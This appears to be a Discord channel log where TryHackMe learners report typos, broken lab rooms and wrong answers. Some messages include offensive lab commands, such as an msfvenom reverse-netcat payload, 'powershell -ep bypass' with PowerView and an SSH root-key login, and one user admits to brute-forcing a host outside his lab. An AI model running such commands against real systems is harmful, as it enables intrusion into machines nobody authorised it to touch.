Hello! I can't get the hackpark web page to load (it just says Loading Tasks... with a spinny wheel) . I have tried from several different browsers and even different machines (both Windows and Linux). Is this room broken for everyone, or is there just something wrong with my profile?

Can an admin fix this problem please. It is one of my last task before the certiciate.

I am having the same issue. I have tried to re-load the machine two times, cleared browser history/cookies and different browsers...no luck!

https://i.imgur.com/Uo89p7z.png
Also this task

what should we do now.. its my last room... maybe an admin can fix this problem?

Mine is working good now. I am just having an issue with winpeas.bat file stuck on repeat and never completing properly.

Ah okay 🤔 but you can answer the question😃 with me the room doesn't load😫

I can't get the answers since the winpeas program won't execute properly.

Have you tried restarting the machine? Clearing your cookies and browser history?

I found that worked for me. After the machine booted I waited 5 minutes before trying the site again

ah ok🙈
with me the room doesn't load, its a endless loading loop😄 i tried different browser and different machines (linux, windows, mac os) and it doesnt load😫

ok i tried it with my ipad, and it seems like working on ipad🙂

I guess if you disable your antivirus it will work 😄

Got that with some other room, antivirus blocks it.

Or before disabling your antivirus, check the logs of it

ah really😃 thanks dude!

Gave +1 Rep to @ocean island

But, the admins should take a look to that and send whatever or do whatever to get that not blocked by antivirus. Don't ask me more, I don't know. But know they fixed it several times for some room I had issues with

Issue can back multiples times in fact 😄

I want to report some typo / non-dynamic ip showup bug in room Linux PrivEsc https://tryhackme.com/room/linuxprivesc In task 18, we are supposed to ssh -i root_key root@10.10.10.10 yes to 10.10.10.10 and that host actually exist. Just saying, was bruteforcing that beast. Ref flags or turning on on that machine i guess. Please, don't ban me, like said, it's a type error in Task 18 😕

Gona start my evening and get a few beers. Do not ask me questions 😛 Have a nice evening

@wheat fractal when you ssh, I’m pretty sure it tells you that you shouldn’t be trying to ssh into that machine, correct?

Also, if I’m not mistaken, the room doesn’t actually tell you to attack 10.10.10.10, right?

Why'd you decide to brute force it though?

Your good! D@mn, I definitively missed a beer on this 😄

It did not worked like expected, and like in previous tasks, changed several times that password too. I just got lost in the end. That's why i need to relax now 😛

I would highly suggest avoiding drinking while you are attacking machines.
If you attack the wrong website while you are intoxicated, you will get in a lot of trouble.

Definitely avoid attacking any systems you don't deploy yourself

Yes of course, was not careful enough on these diff IPs

Also, big leap between logging in with a key and actively attacking a system though

No no, was not drinking. I just took now a beer after finished this one

And I don't attack machines on the internetz anyway

Just be careful 🙂

Yeah, long day, time to chill and relax with a beer now

:)

maybe have it changed to MACHINE_IP?

Done did (:

ssh -i root_key root@10.10.106.98

Hello, I'm currently working in the Mobile Malware Analysis room.

The problem is : we need to go on virustotal.com but the machine provided don't have Internet access. How I am supposed to analyse the Malware? Thx for help

Not really a bug for the room itself but in blue. when you do shell_to_meterpreter if you haven't updated in the last 9 days it will fail from the encoding being the max length for powershell. Nothing to be fixed but a note for anyone who complains about that problem just needs to update.

Error Given By metasploit when running shell_to_meterpreter: [-] Post failed: Rex::RuntimeError Powershell command length is greater than the command line maximum (8192 characters)

Metasploit Patch Note showing issue: https://github.com/rapid7/metasploit-framework/issues/15528

Maybe try transfering the file over to your computer?

@dusky junco

How ? By RCP ?

on the room alfred, I cant get a reverse shell with net cat even though I'm doing everything right based on the walkthroughs

Is the machine Windows?

Idk i haven't done that room

Yes, I'm going to use remmina to transfer over rdp

It looks like your AttackBox IP is 10.10.64.83, not 10.10.1.22

Hi there, Doing the Sysinternals room: https://tryhackme.com/room/btsysinternalssg And the first questions - "When did Microsoft acquire the Sysinternals tools?" A: 2005. According to wikipedia it is July 18, 2006 https://en.wikipedia.org/wiki/Sysinternals Do I miss somethings?

ok thanks, sorry I know this isn't the right channel, but I was just wondering when you're supposed to use the AttackBox IP and the active Machine IP for tasks, like nmap works for both AttackBox IP and active machine IP, accessing the web server only works with active machine IP, not AttackBox IP and this script only works on AttackBox IP, why?

Gave +1 Rep to @obsidian kiln

The attackbox is the machine you fully control, usually

The target machine is usually the machine you're attacking

ok thanks

Hey, im just having trouble the Vulnversity box, I'm at the point where I'm trying to upload a php reverse shell but it just times out the upload

#room-help preferably, not a bug with the room.

@eternal summit ill ask the guys in that room

i didnt even see that other room thanks for that

shouldn't the A for Q Besides .PHP, what other extension is recorded for this file? in the Florian Roth – erm YARA room (https://tryhackme.com/room/yara) rather be ||txt|| ?
||exe|| doesn't show up anywhere, but ||txt|| does https://valhalla.nextron-systems.com/info/search

At the Memory Forensics room, Task 3, the question was:
What did John write?

Well, John wrote:
THM{....}
But, the correct answer is what's in the curly braces, discarding the THM{} part. What the heck means this? I could have lost plenty of time figuring out what the correct answer is with the answer in front of my eyes.

OWASP Top 10
task 26
feedback page
Internal Server Error

The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.

https://tryhackme.com/room/tmuxremux

@sleek jay

what task @worldly grotto ?

2

found it ty

updated (:

ty

In the Kubernetes Chall TDI 2020 room, I've tried connecting to the cluster using the hint provided, but still no luck.

$ KUBECONFIG=diana.kubeconfig kubectl --server https://10.10.145.55:6443 --insecure-skip-tls-verify version 
Client Version: version.Info{Major:"1", Minor:"20", GitVersion:"v1.20.2", GitCommit:"faecb196815e248d3ecfb03c680a4507229c2a56", GitTreeState:"archive", BuildDate:"2021-06-13T07:08:18Z", GoVersion:"go1.15.9", Compiler:"gc", Platform:"linux/amd64"}
The connection to the server 10.10.145.55:6443 was refused - did you specify the right host or port?

Am I doing something wrong or it's the room?

Thank you, I am actually not a creator of this room. I was just added to it.

Gave +1 Rep to @worldly grotto

mental note, add 0day to all my rooms

I think he has to click on the co-op room link, right?

To join it as a creator*, that is^^

the access URL which is in the room design page under "Access" yes (:

Unless an admin/staff joins it themselves

Night guys, i'm in the XSS playground and when the xss works and pops the alert in my screen i dont receive the flag, can anyone help?

lmao

@dusky junco , have you checked this one out regarding Task11 in the yara room? 🙂

Hi, the room of splunk 2 don't load the data from botsv2. You can see the app is present, but nothing appear when you try to perform some search.

yes indeed (: thanks for reporting. I have resolved this.

Gave +1 Rep to @thorn forge

Dunno if this is intended or a bug but the host at 10.10.169.100 of task 14 of advent of cyber 2019 room is unreachable

On the right side of search bar, change "Last 24 Hours" to "All Time" via the dropdown menu and then search again. Good luck!

Hi Yuma, yes i already did that, but nothing happen

Hello good day, I'm in room Mobile Malware Analysis and on Task4 theory, there is a bit typo - "you can analyze the filw with MobSF" where it should be file.
P.S. I have marked the typo with underline. (:

Second thing I would like to add is that in room Mobile Malware Analysis, Task4, question 1 states that "What does Avast-Mobile can tell us about this software?"
When I look up at virustotal with the file hash, the answer I got from Avast and not Avast-Mobile.
This answer fulfills the answer tolerance of THM. I tried the paste the answer of Avast-Mobile av but the answer was not accepted.

And it is strange that I pasted this answer and it got accepted. I tried to refresh the page of site itself (just to make sure if I am not doing something wrong), the answer changes from Android:Metasploit-G [PUP] to Android:Metasploit-Q [PUP].

/room/ustoun - Regarding to several other people wondering about the sql service on port 1433 not being open, even after waiting 10+ mins as recommended in the room, I also tried to scan it. Even after 1 hour the port is not being open trying several different scan methods. If anyone could check that would be highly appreciated. Tried with the attackbox.

Hi, This is regarding the ustoun room - https://tryhackme.com/room/ustoun The sql service is not starting in the box even after 20 minutes and the machine dies after 1hr.

@glad badger reckon this may be worth looking into ^^ 🙂

I learned alot in the NMAP room but @ task 14 I noticed two irregularities. Scanning the first 5000 ports with 'nmap -p1-5000 -sS 10.10.123.27 -Pn -vv' I only find 22, 80,111 and 3389 to be open, so my truthful answer would be 4 rather than 5.
On the last question I first answered N, since the state for port 21 when running 'nmap --script=ftp-anon -p21 10.10.123.27 -vv' is closed. 😛 Hopefully the fault didn't lie with me, if that's the case I apologize for reporting it as a bug.

😫

Are you sure you have scanned the right machine? As when I scanned it, there are the correct amount of ports open, also the port numbers you provided here are not all the same as in my results ^^ Regarding the results it appears you scanned your own machine, as the same ports are open when I scan my attackbox 🙂

Will give it another go ^^ thanks for the reply mate

Gave +1 Rep to @raw bison

theres an unintended in https://tryhackme.com/room/introtopwntools to get straight to root. who do i message about this (so as to not spoil it)

I just started https://tryhackme.com/room/introtopwntools an hour ago. I have not enjoyed doing binary exploitation before and that's the reason I avoided it, but this module makes me learn!

Room - Intro To Pwntools, task5, question3 hint. There is a typo "If NX in enabled" where it should be is.

Splunk101: Opening the VM, the google link doesn't work / displays critical update.

Not necessarily a bug but in intro to pwntools answer 4 is not obfuscated in the final python script 🙂

Answer 4 in the last task*

There’s an unintended where you can edit the ASLR shell script too and just run that as sudo (well you move it, then write your own disableASLR.sh file which you can then run as sudo. It’s your directory. You do what you want lol

Hahah, that's hilarious - I didn't even think of that. I was under the impression that there was a sudo rule and owned by root 😆

It’s a common Mis configuration I find on tryhackme

Might want to give VulnNet: Active a bit of love on free - It gets killed with a simple nmap scan (Unless that's intended - Which seems a bit odd)

Very minor bug: In the python room, if a user comments their previous solutions before moving to task 4, they are given the wrong (previous) flag instead of the one for task 4.

in script.py tab

Isn't this room meant to have answers to the questions? Only two questions required an answer. - https://tryhackme.com/room/ctf

Has anyone had this issue with the Steel Mountain room when running Meta?
<This exploit may require manual cleanup of '%TEMP%\NpWaTn.vbs' on the target>

Evening, Shodan Room : T3 Q1 needs updating : (new version) ; Q4 needs updating; (new locations); Q5: os version (outdated); Task 6 - Double entry on plugin explanation.

more a #room-help issue, however. i didnt use metasploit for that room, but this is telling you is the stager or parts of the exploit is still on machine you were pointing it at.

That's not actually an error.

Just advice

https://tryhackme.com/room/mma

• Task 4 - "or you can analyze the filw" -> "or you can analyze the file"
• Task 4, Question 1 - "What does Avast-Mobile can tell us about this software?" -> It wants the answer from Avast, not Avast-Mobile
  (Which was actually reported in the Forums 22 days ago)
• There also seem to be 23 permissions, not 22
• Task 6 - The permission is named GET_ACCOUNTS not GET.ACCOUNTS

Hi there, could there be a bug in the exploit telnet task of Network Services room?

Tried the run the command msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R but there is nothing moving

lhost parameter had the ip of the victim machine

That's incorrect

....nothing moving?

I'd recommend #room-help or #room-hints
This isn't a bug with the room

Archangel Spoiler 🙂 ||Hi everyone, i have little question that concern archangel room, i'm on the last task (found root flag) and i'm on a track (i think correct), when i strings backup file i have find a wildcard exploit (probably) but, the path in binary doesn't correct (cp /home/user/archangel/myfiles/ *), instead of (cp /home/archangel/myfiles/ *) its normal ? Thanks 🙂 (ps: sorry for my english)||

In linux, Home directories are /home/[username], if you go into Archangel’s home directory and type pwd, you will see the full working directory:)

Thanks @hazy tiger, but spoiler ||I think I misspoke, but in fact when I look in the 'backup' binary there is this path 'cp /home/user/archangel/myfiles/* /opt/backupfiles' however the path does not exist because the real path is '/home/archangel/myfiles/' it is an error in the box?|| ty for your responses 🙂

Gave +1 Rep to @hazy tiger

Some of the questions in the osquery room (by heavenraize) have slightly wrong numbers which result in the room getting impossible to complete unless you straight up guess,

the questions of concerns are

1: How many of the tables for this version are compatible with Windows? which have the right answer as ||"266"|| when it should be ||"271"|| for version 4.7.

2: How many of the tables for this version are compatible with Windows? which have the right answer as || "96" || when it should be || "98" || for version 4.7.

3:How many tables are compatible with Linux? which have the right answer as || "155" || when it should be || "156" || for version 4.7.

reason for these errors is likely due to the fact that when the room was created the current version in use was 4.7, but more tables got added to version 4.7 after the room was made, so the numbers got a little skewed,(this is why it's good idea to base question on a least a minor version behind instead of latest which can change before next version).

i am currently still going trough the room at the moment, so i can not say for sure if there's other questions that need to be corrected or not, but i will be sure write a update after i completed the room if i come across further issues

https://tryhackme.com/room/wordpresscve202129447

• Room Description - privilages -> privileges

• Task 1
  -- "for this exercise I used zlib library for this razon" -> reason
  -- "Create a php file whith" -> with
  -- "wordpres " -> wordpress (Or Wordpress / WordPress)
  -- "necesary" -> necessary
  -- nano poc.wav then echo into payload.wav - Nano isn't even used, and neither is poc.wav - Only payload.wav (That was created by the echo) is used

• Task 2
  -- Enurate -> Enumerate

An overall grammar pass might be required (And potentially a proof reader before future submitted rooms are accepted...)

Hey, linuxfundamentalspart1, Task 7, the redirect answers are swapped

@glad badger

Seems like someone has given it a once over after I posted that - Still got a whith (Which may have been correct 400 years ago - Not so much today) and a privilages in the room description though (And the Enurate and a plaint text in Task 2) 🙂

https://tryhackme.com/room/introtolan Task 3. Why is 'adress' allowed for the first question but not for the second one?

Answer tolerance. It's based on a % of incorrect characters

But still I wasnt able to submit 'ip adress'

Yeah. But MAC address is longer.

So 1 character out of that is a smaller % than one character in ip address

In the XSS Room(https://tryhackme.com/room/xss), Task 9, there is image that apparently shows "Other Exploits". But it points to an non-existent URL.

Link to image => https://d21ic6tdqjqnyw.cloudfront.net/wp-content/uploads/2013/01/08111203/BlogHeader.png

Also, the same task asks users to visit "http://xss-payloads.com/", a website that no longer exists

I think it would be pretty difficult to figure out the privilege escalation path without looking at the writeup due to this 🤷‍♂️

a fair few people solved this room without a writeup within a week, it was a challenge however there are other methods to work that out

not sure that makes it a bug just because it might be difficult

i solved it without ever running that

how'd you find the binary you needed to exploit?

It's a decently documented vuln, but at the time it didn't show in Enum scripts. Not sure if it still doesn't

it did show in liniux exploit suggester, which is how i eventually found it but it was like the 4th option and not very confirmed

it also did highlight a little in linpeas but not much, I think john hammond found it that way in his video

¯\_(ツ)_/¯ it's a hard box

ya I mean, it's just not what Muiri intended based on his official writeup so

yeah, it's kind of a bug

if anything that makes his writeup no longer accurate but the room itself isn't bugged

he created the room 😄 it's not what he intended to happen, he even says it won't show up in linpeas

I guess it's fortunate it does show up in enumeration scripts now otherwise it'd be almost impossible to find it

this video, John Hammond finds it using linpeas, not exactly conventionally but it is there around 39 mins or so

https://www.youtube.com/watch?v=g2CnIgjHeX8

again, I used Linux Exploit Suggester (and this is when the box first came out), and it did show up there as well

(i said linenum and was mistaken)

but yeah, it's supposed to be hard not just run x and get answer

Not a bug (functional issue on the target). 🙂

got told to put this in this channel so i will just pastecopy what i said earlier:

Regarding the nessus room which involves you registering and installing everything but requires huge amount of space which the THM's attackbox don't have, so i ended up wasting 4hours of my day before realising it was a space issue as nessus installing screen didn't say anything but just was stuck at "initilizing", so people may want to know upfront that "This room requires more space then what THM attackbox have available, so you have to download and install everything outside of THM if you want to do complete this room"

Installation part say "We will be installing Nessus on a Local Kali VM" but does not indicate why, would properly be best to change it to "We will be installing Nessus on a Local Kali VM because attackbox on thm does not have the 30GB nessus requires" or something.

Also the old version used to recommend a dedicated VM for Nessus which is good practice

If I may, I'd like to inform the THM staff that I spotted just a little English mistake

@golden fable #site-bugs

My bad

Getting the output to work on the XSS room but not being presented with a flag

Yeah, the room/box was designed to only recognize specific methods used since XSS by its nature is very open-ended and hard to capture every single possible attack

the method you're using is a valid XSS attack but the box is unable to recognize it, and the only hint I can give is that the box will recognize a specific alternative method of alert() as the correct answer

Thanks, i got it shortly after, I just thought it was a bug :)

haha yeah, the XSS room is one of the oldest rooms on the site

a literal dinosaur

it was supposed to be replaced 👀

Can someone help me the OpenVPN profile will not download for me? Any suggestions?

#site-support , check the pinned messages

In Disk Analysis & Autopsy room, Application tab can't open to find Network card info.

Also can't look up manually to go to windows\system32\config\software\Microsoft\Windows NT\CurrentVersion\NetworkCards\

Plz some one guide me this is bug or I'm doing something wrong?

https://tryhackme.com/room/shodan
Is this room has bug? Its not accepting any answer from task 3

Room: https://tryhackme.com/room/ironcorp shuts down at 58mins left on the timer, you have to reset the box and restart where you left off.

?

Hey guys i think "" Learn the Linux Fundamentals Part 2 "" Task 2 "" Login to the SSH doesnt work. It says tryhackme:tryhackme but the password doesnt work. gives back "Permission denied, please try again."
plz teach me or fix this THX

Sounds like you might be attempting to SSH into the attackbox.

omg sorry for that xD i used the top ip adress not the one out of the "red"banner. Thank you !

Gave +1 Rep to @eternal summit

Hi there, I want to report an error in room "Linux Local Enumeration" https://tryhackme.com/room/lle. They forgot to mention to "chmod 600 ~/.ssh/authorized_keys" on the target in Task 3. To who can I report this issue?

You've reported it by posting it here.

cool 🙂

I would add something like: If the "authorized_key"s does not exist, create it and "chmod 600 authorized_keys".

Like it actually is with that box

typo: https://tryhackme.com/room/linuxmodules task 7

Howdy all. I think Pre Security Path -> Windows Fundamental 3 - Task 5 has an issue. The questions asks "If you were connected to airport Wi-Fi, what most likely will be the active firewall profile?" But the correct answer is not a "Profile".

So I am in THM with a VM. I have downloaded and ran the vpn. THM says that I am connected, but when I go to see the information in the THM room. What am I doing wrong.

Hi there, I want to report another error in room "Nax" - https://tryhackme.com/room/nax The question about the Metasploit should be updated "After Metasploit has started, let's search for our target exploit using the command 'search applicationame'. What is the full path (starting with exploit) for the exploitation module?". By now, with an up to date system it is "exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce" and NOT "exploit/linux/http/nagios_xi_authenticated_rce". So I had to cheat for this one. Very very very nice room btw! Crazy people with my crystal ball in rabbit holes 😄

Hello, Not sure if this room is ideal for that kind of issues. I bet you are better in #site-support Maybe you have an issue with the actual OpenVPN config file? Re downloaded it multiple times and used another VPN server and using an older one now? Maybe just try to re download a new one and keep using this? No clue otherwise.

Hi, I want to report about room Active Directory Basic, the machine on room 8, most of the command mentioned in the task will not work , I just get errors, I read some write ups and they used the same commands

These 2 commands will not work on the machine, please take a look at it

https://tryhackme.com/room/introtopwntools Task5 Q4 Hint, should it be "in ascii"

https://tryhackme.com/room/vulnversity, task 4:
Every time I click the "Choose file" button, Chrome crashes. I'm not sure if this is a problem of the box/web page or on my end, all help is appreciated.
Burp is set up via FoxyProxy, no issues there.
Burp's embedded Chromium also crashes.
Firefox crashes as well.

Task 5: Q2 command wrong --> cook '[0-255] right --> cook 0-255 look at the image room link --> https://tryhackme.com/room/ffuf

Here this page does not load. I mean, I bet my antivirus blocks this page from loading.

Seems like this page load back again. (I did not do anything, i'm not admin or contributor or staff member)

I just tried again and had no issues, so seems to be fixed/have fixed itself.

i don't think this is okay : https://i.imgur.com/jksPbVA.png
room : https://tryhackme.com/room/anthem

what isn't okay?

It doesn't respond to pings

And have more patience too. Give it time to boot up and run all services 😛

hello, can someone take a look at this room

Hi, is there any staff online at the moment?

Probably didn't import the module correctly?

I did the command:
powershell -ep bypass
.\PowerView.ps1

You're missing a character

Well, two.

You're running it. You're not loading/importing it.

Dot space dot backslash. . .\PowerView.ps1

You can also use Import-Module

Thank you, although it freezes for a few seconds, it works now

i'm stupid not realize that I miss the first dot

There's a slight problem with task 4 in the "MITRE" room, it seems to have wrong references in the last question which says "Examine CAR-2013-05-004", but the CAR link listed in task 4 goes goes to CAR-2014-11-004,

due to CAR ending with 004 and the fact that the questions to answer was to be found in CAR-2013-05-004 but not in CAR-2014-11-004 i can't help but come to any other conclusion that wrong link was accidentally provided

Fixed, thank you for reporting.

Gave +1 Rep to @upper kiln

Introductory Networking Task 4: the hint asks for the British spelling however SYN Packet is a proper noun. RFC 5562, Mozilla, and Rapid7 all spell it with a Z.

https://datatracker.ietf.org/doc/html/rfc5562
https://developer.mozilla.org/en-US/docs/Glossary/TCP_handshake
https://en.wikipedia.org/wiki/SYN_flood
https://www.rapid7.com/blog/post/2017/11/27/firewall-reporting-excessive-syn-packets/

Introductory Networking Task 7: whois microsoft.com no longer provides an address with the request. Performed on both Kali and an ICANN lookup

hello, Please help me what wrong with that ?

Kenobi task 3, searchsploit proftpd 1.3.5 returns 3, but the exploitdb website shows 4, the right answer is 4 not 3(the hint is incorrect)

REMOVED THIS ISSUE CAUSE JUST ME THAT WAS DUMB

i'm trying to ssh into sarah of linux strength training room from my kali machine, but entering the following syntax:
ssh sarah@MACHINEIP it's not starting, i have connected it with openvpn properly. Please help😭

If it still says MACHINE_IP then it's not deployed

i have checked the connection page of openvpn, it's showing there connected
i don't understand how to counter this

Okay, this isn't a connection issue.
You have not started the machine in order to interact with it.

you mean the start machine option which gives the ip of machine?

The IP of the target machine will be shown under Active Machine Information near the top of the page. Not in the top bar.

yes, i copies that ip
with last ip connection timed out, i restarted the machine, got new ip and now boom
again connection timed out

Head over to #site-support

thanks

room/win64assembly Task 7, second example

mov RAX, 2
cmp RAX, 8  ;  2 - 8 = -6
```Typo? (cmp instead of sub)

Probably best to specify what room too?

Ohh yeah, copy-pasted it from #882360112969297973, thought that was the right chat to report . Sorry!
Well now you know 😅

@shrewd garden ^^

AdamTLangleys new room on subdomain enumeration - crt.sh is down and therefore you cannot complete task 2

Ah nevermind it was because of my VPN

Evening, I believe I entered the wrong answer in one of the chisel questions on Wreath. However it registered as a success.

How is the rooms maintained after release, should I report it to the creator or is it handled by staff in some other way?

Refresh the page and check again

Reporting it here is the correct way to handle it

Sorry, could you elaborate? The answer is "Locked in"

When you refresh the page, the answer is replaced with the actual correct one

There's a small tolerance on answers, you can get a few characters incorrect

Aa, I see now

Is this is okay even if the answer was wrong. The command I entered will not work in reality.

Room creators have no control over answer tolerance

Okay, thanks for your time. Let me know if you want further detail of what I did incorrectly. I saw there was a "Known Issues" page, but this perhaps don't apply. New to thm as of this week.

Gave +1 Rep to @eternal summit

Thanks for pointing it out. I'll fix it ASAP. I'll probably re-word that section as well, seems a bit funky.

Gave +1 Rep to @fathom ermine

Should be fixed now!

Hi Muiri, I ran into this problem yesterday too. Whitelisting works, figured I'd let you know anyway though!

Hello !

I have some issue with the "Hacking with PowerShell" room, and i think these are bugs. Is there someone to report them?

It seems that some Cmlet are missing

and a name of a file to be found is not exact

i'm not sure i can post more details here as i don't want to spoil...

Yes, you can

Task 9 of the room https://tryhackme.com/room/xss, one of the images doesn't load.

When trying to gte the count of cmdlet Task 3.3, i use the fllowing command :
(Get-Command | Where-Object -property CommandType -eq Cmdlet).Count
Get-Command | Where-Object -property CommandType -eq Cmdlet | measure
Both are returning the same number but which is an invalid answer

The name of the file contains two time the extension .txt : -a---- 10/3/2019 11:38 PM 23 interesting-file.txt.txt

The following Cmdlet are not in the machine :
Get-LocalUser
Get-LocalGroup
Get-ScheduleTask

Let me know if i made mistakes. 😉

That's a little rude and not really a way to express that you have found a bug.

I would recommend that you fix your attitude 🙂

-warn @wheat fractal I would seriously suggest you start acting right. I don't know why you think it's acceptable to be rude to anyone in the community but it is not. Fix your attitude.

⚠ Warned lorecyber#1553

How websites work > Task 5 > View Website - Using the enter button after typing your string/injection does not work as user intended, requires user to press website button... 🙂

I need help about Autopsy 2 room! When I try to insert the image, machine just crash. Is there any way I can get IMG file to my own VM machine ?

this is less of a bug and more a "it's not wrong, but i think maybe a correction/addendum are recommended to be considered", so i file it under under this room, if wrong please enlight me:

in the pythonbasics room on task 9, you are told you need to use close() after you are done writing to it, and while this is correct in regards on how it is written, it is considered best practice(as far as i have learned) to use the with statement before opensuch as with open(file.txt) as the with statement will automatically close the file once it's done with it and you don't have to use the close() statement at the end, that way you also avoid the file being kept open if a bug prevents the close()statement or call it too early, knowing when when to close the file can also be hard to know sometimes, but with the with statement, it will be closed at the right time which prevents corruption and loss of data

https://tryhackme.com/room/wordpresscve202129447
the description could do with some english improvements:

Vulnerability allow a authenticated user whith low privilages upload a malicious WAV file that could lead to remote arbitrary file disclosure and server-side request forgery (SSRF).

to

A vulnerability that allows an authenticated user with low privileges to upload a malicious WAV file that could lead to remote arbitrary file disclosure and server-side request forgery (SSRF).

I think there is something wrong with the VulnUniversity machine. I'm unable to get a version detection on the squid proxy service, and I'm only getting timeouts when trying to use gobuster, visiting the webserver does not work either. I have tried to reset the machine, but it did not fix the issue

That sounds like a VPN issue.

Totally was, thank you

Gave +1 Rep to @eternal summit

shouldnt return the you are in correct? becuase the database shouldnt return that massage if false

and because 1 > 2 is false the message shouldnt be appearing

Room, task, question?

yep hold on @eternal summit

https://tryhackme.com/room/sqlibasics unit 6

https://tryhackme.com/room/jupyter101 task2 support material link is unavailable

https://tryhackme.com/room/intro2windows task6: First paragraph contains login information for RDP, which has a typo
typo acct info: Administrator:T ryhackme123!
real acct info : Administrator:Tryhackme123!
someone new to RDP might not know why they're failing to connect if they don't try the actual pass.